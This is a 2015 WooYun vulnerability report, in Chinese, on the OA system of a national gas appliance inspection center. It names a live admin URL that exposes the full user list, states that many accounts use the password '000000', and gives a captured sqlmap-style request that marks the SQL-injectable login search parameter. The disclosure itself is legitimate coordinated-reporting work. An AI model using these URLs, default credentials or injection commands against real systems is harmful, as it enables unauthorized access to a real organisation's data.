漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-097953
漏洞标题:国家燃气用具质量监督检验中心OA系多处漏洞打包(大量用户存在弱口令)
相关厂商:国家燃气用具质量监督检验中心
漏洞作者: 路人甲
提交时间:2015-02-24 10:53
修复时间:2015-04-13 16:58
公开时间:2015-04-13 16:58
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-24: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-13: 细节向公众公开
简要描述:
2
详细说明:
详情请看 WooYun: 国家燃气用具质量监督检验中心某系统存在注入万能密码可登入(致大量合同外泄)
漏洞1:越权查看OA 系统所有用户http://oa.chinagas.com.cn/new/List_Admin.aspx?type=10
问题的关键是很多人的密码是000000
漏洞2:sql注入 就在这个页面的搜索处
抓包的数据
http://oa.chinagas.com.cn/new/List_Admin.aspx?type=10 --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyMTQxNDk0MzMPZBYCZg9kFgQCCQ8WAh4LXyFJdGVtQ291bnQCHhY8Zg9kFgRmDxUHCW5hbWU9J3h0JwMyODMDMjgzCeWImOi0teW3nRDmo4DmtYvlrqQx5Lq65ZGYEDIwMTUvMS81IDk6NTQ6MTMUVXNlcl9BZGQuYXNweD9pZD0yODNkAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFAzI4M2RkAgEPZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMjUyAzI1MgbmnY7ok5MW5qOA5rWL5a6k6aKG5a%2B8MeWKqeeQhhAyMDE1LzIvNiA4OjUxOjU0FFVzZXJfQWRkLmFzcHg%2FaWQ9MjUyZAIBDw8WAh8BBQMyNTJkZAICD2QWBGYPFQcJbmFtZT0neHQnAzIyMwMyMjMG5byg5Y2OEOajgOa1i%2BWupDHkurrlkZgRMjAxNS8yLzE1IDk6MTU6NDkUVXNlcl9BZGQuYXNweD9pZD0yMjNkAgEPDxYCHwEFAzIyM2RkAgMPZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMjA5AzIwOQnmnajmlofph48Q5qOA5rWL5a6kMuS6uuWRmBIyMDE1LzIvMTEgMTk6MjI6MDEUVXNlcl9BZGQuYXNweD9pZD0yMDlkAgEPDxYCHwEFAzIwOWRkAgQPZBYEZg8VBwluYW1lPSd4dCcDMTkzAzE5Mwnkuo7lpo3lpo0J5Yqe5YWs5a6kETIwMTQvNy85IDExOjMyOjUwFFVzZXJfQWRkLmFzcHg%2FaWQ9MTkzZAIBDw8WAh8BBQMxOTNkZAIFD2QWBGYPFQcnIG5hbWU9J3h0Micgc3R5bGU9J2JhY2tncm91bmQ6I2FkZDdlZjsnAzE4OAMxODgP5peg6L6F5qOA5Lq65ZGYEOajgOa1i%2BWupDLkurrlkZgAFFVzZXJfQWRkLmFzcHg%2FaWQ9MTg4ZAIBDw8WAh8BBQMxODhkZAIGD2QWBGYPFQcJbmFtZT0neHQnAzE4NwMxODcD5pegEOajgOa1i%2BWupDHkurrlkZgAFFVzZXJfQWRkLmFzcHg%2FaWQ9MTg3ZAIBDw8WAh8BBQMxODdkZAIHD2QWBGYPFQcnIG5hbWU9J3h0Micgc3R5bGU9J2JhY2tncm91bmQ6I2FkZDdlZjsnAzE0MQMxNDEG6ZmI56iLEOajgOa1i%2BWupDHkurrlkZgSMjAxNC84LzE3IDIyOjIzOjA0FFVzZXJfQWRkLmFzcHg%2FaWQ9MTQxZAIBDw8WAh8BBQMxNDFkZAIID2QWBGYPFQcJbmFtZT0neHQnAzE0MAMxNDAJ5p2o5Zu95by6EOajgOa1i%2BWupDHkurrlkZgRMjAxNS8xLzI3IDk6MDk6MzkUVXNlcl9BZGQuYXNweD9pZD0xNDBkAgEPDxYCHwEFAzE0MGRkAgkPZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMTM2AzEzNgbkvZXlt6UQ5qOA5rWL5a6kMeS6uuWRmBEyMDE0LzUvMjYgOTo1NTozMhRVc2VyX0FkZC5hc3B4P2lkPTEzNmQCAQ8PFgIfAQUDMTM2ZGQCCg9kFgRmDxUHCW5hbWU9J3h0JwMxMjUDMTI1BumZiOa1qRDmo4DmtYvlrqQy5Lq65ZGYEDIwMTUvMi82IDk6MTM6MzcUVXNlcl9BZGQuYXNweD9pZD0xMjVkAgEPDxYCHwEFAzEyNWRkAgsPZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMTI0AzEyNAbnmq7mtIsQ5qOA5rWL5a6kMuS6uuWRmBIyMDE1LzIvMTAgMTQ6Mjc6MDkUVXNlcl9BZGQuYXNweD9pZD0xMjRkAgEPDxYCHwEFAzEyNGRkAgwPZBYEZg8VBwluYW1lPSd4dCcDMTIzAzEyMwnlvKDkuYPmlrkQ5qOA5rWL5a6kMuS6uuWRmBIyMDE0LzcvMTEgMTU6MjU6MTIUVXNlcl9BZGQuYXNweD9pZD0xMjNkAgEPDxYCHwEFAzEyM2RkAg0PZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMTE2AzExNgnkuo7mtKrmoLkQ5qOA5rWL5a6kMeS6uuWRmBIyMDEyLzExLzUgMTU6NTE6MzcUVXNlcl9BZGQuYXNweD9pZD0xMTZkAgEPDxYCHwEFAzExNmRkAg4PZBYEZg8VBwluYW1lPSd4dCcDMTE1AzExNQnpmYjmtKXolYoQ5qOA5rWL5a6kMeS6uuWRmBIyMDE1LzIvMTAgMTU6MTQ6NDAUVXNlcl9BZGQuYXNweD9pZD0xMTVkAgEPDxYCHwEFAzExNWRkAg8PZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMTE0AzExNAnmnajkuL3mnbAQ5qOA5rWL5a6kMeS6uuWRmBIyMDE0LzExLzUgMTE6Mzg6MjcUVXNlcl9BZGQuYXNweD9pZD0xMTRkAgEPDxYCHwEFAzExNGRkAhAPZBYEZg8VBwluYW1lPSd4dCcDMTEyAzExMgbniZvniocQ5qOA5rWL5a6kMeS6uuWRmBEyMDE1LzIvOSAxNTozODozNRRVc2VyX0FkZC5hc3B4P2lkPTExMmQCAQ8PFgIfAQUDMTEyZGQCEQ9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI2MgI2MgnmnY7mlofnoZUJ5Yqe5YWs5a6kEzIwMTIvMTIvMTggMTU6MjI6NTETVXNlcl9BZGQuYXNweD9pZD02MmQCAQ8PFgIfAQUCNjJkZAISD2QWBGYPFQcJbmFtZT0neHQnAjYxAjYxBuW8oOWGmxDmo4DmtYvlrqQx5Lq65ZGYETIwMTUvMi82IDE0OjU0OjM2E1VzZXJfQWRkLmFzcHg%2FaWQ9NjFkAgEPDxYCHwEFAjYxZGQCEw9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI2MAI2MAnliJjljZrkuKUQ5qOA5rWL5a6kMeS6uuWRmBMyMDE0LzEyLzE2IDE1OjEwOjA0E1VzZXJfQWRkLmFzcHg%2FaWQ9NjBkAgEPDxYCHwEFAjYwZGQCFA9kFgRmDxUHCW5hbWU9J3h0JwI1OQI1OQnovpvnq4vliJoQ5qOA5rWL5a6kMeS6uuWRmBIyMDE1LzIvMTQgMTA6NDk6NTkTVXNlcl9BZGQuYXNweD9pZD01OWQCAQ8PFgIfAQUCNTlkZAIVD2QWBGYPFQcnIG5hbWU9J3h0Micgc3R5bGU9J2JhY2tncm91bmQ6I2FkZDdlZjsnAjU4AjU4Bumtj%2BiMuRDmo4DmtYvlrqQx5Lq65ZGYEjIwMTUvMi8xMyAxMDoxMjoxNhNVc2VyX0FkZC5hc3B4P2lkPTU4ZAIBDw8WAh8BBQI1OGRkAhYPZBYEZg8VBwluYW1lPSd4dCcCNTcCNTcJ5byg5bu65rW3EOajgOa1i%2BWupDHkurrlkZgSMjAxNS8yLzEwIDE2OjI3OjUwE1VzZXJfQWRkLmFzcHg%2FaWQ9NTdkAgEPDxYCHwEFAjU3ZGQCFw9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI1NgI1Ngbpvpnpo54Q5qOA5rWL5a6kMeS6uuWRmBEyMDE1LzEvMjMgODo0ODo1MRNVc2VyX0FkZC5hc3B4P2lkPTU2ZAIBDw8WAh8BBQI1NmRkAhgPZBYEZg8VBwluYW1lPSd4dCcCNTUCNTUJ5L2V6LS16b6ZEOajgOa1i%2BWupOmihuWvvDESMjAxNS8yLzE0IDEyOjE0OjIzE1VzZXJfQWRkLmFzcHg%2FaWQ9NTVkAgEPDxYCHwEFAjU1ZGQCGQ9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI1MwI1MwnmvZjnv6Dmma8Q5qOA5rWL5a6kMeS6uuWRmBEyMDE1LzIvMTQgOTozMTo0ORNVc2VyX0FkZC5hc3B4P2lkPTUzZAIBDw8WAh8BBQI1M2RkAhoPZBYEZg8VBwluYW1lPSd4dCcCNTICNTIJ5byg5oyv5YiaEOajgOa1i%2BWupDHkurrlkZgRMjAxNS8yLzExIDk6MDI6MTQTVXNlcl9BZGQuYXNweD9pZD01MmQCAQ8PFgIfAQUCNTJkZAIbD2QWBGYPFQcnIG5hbWU9J3h0Micgc3R5bGU9J2JhY2tncm91bmQ6I2FkZDdlZjsnAjUxAjUxBumrmOehlRDmo4DmtYvlrqQx5Lq65ZGYETIwMTUvMi8xMCA5OjE5OjMwE1VzZXJfQWRkLmFzcHg%2FaWQ9NTFkAgEPDxYCHwEFAjUxZGQCHA9kFgRmDxUHCW5hbWU9J3h0JwI1MAI1MAnluLjljY7liKkQ5qOA5rWL5a6kMeS6uuWRmBAyMDE1LzIvMyA4OjI5OjE3E1VzZXJfQWRkLmFzcHg%2FaWQ9NTBkAgEPDxYCHwEFAjUwZGQCHQ9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI0OQI0OQbpmYjlspoQ5qOA5rWL5a6kMeS6uuWRmBIyMDE1LzEvMjkgMTI6MzQ6MzUTVXNlcl9BZGQuYXNweD9pZD00OWQCAQ8PFgIfAQUCNDlkZAILDw8WAh4LUmVjb3JkY291bnQCLmRkZMtMwkXB0AvPOy9aTqi%2FABPMikLC&__EVENTVALIDATION=%2FwEWIgKi4%2FOjDgLynKKsDwKa%2FIipBgKZ7YzdCgKlkPryBQKlkK7CDQKlkMK4DwKlkNauAQKlkMrLDQKlkL7oCQKlkNLeCwKlkObUDQKlkNpWAqWQjsEBAvSt5osCAvStmtsJAvStrtELAvStwscNAvSttuQJAvStqoEGAvStvvcHAvSt0u0JAvStxu8MAvSt%2BtkNAsOw6YYJAsOwnVYCw7CxzAICw7DFwgQCw7C5XwLDsK38DALDsMHyDgLDsNVoAsOwyeoDAsOw%2FdQEdu1X4jVGkiE21yJL66ZWA%2B60Sac%3D&ids=&txtloginname=s&txtSearch=+" -p txtloginname
漏洞证明:
22
修复方案:
你们懂
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2015-03-02 15:36
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给相关单位通报。
最新状态:
暂无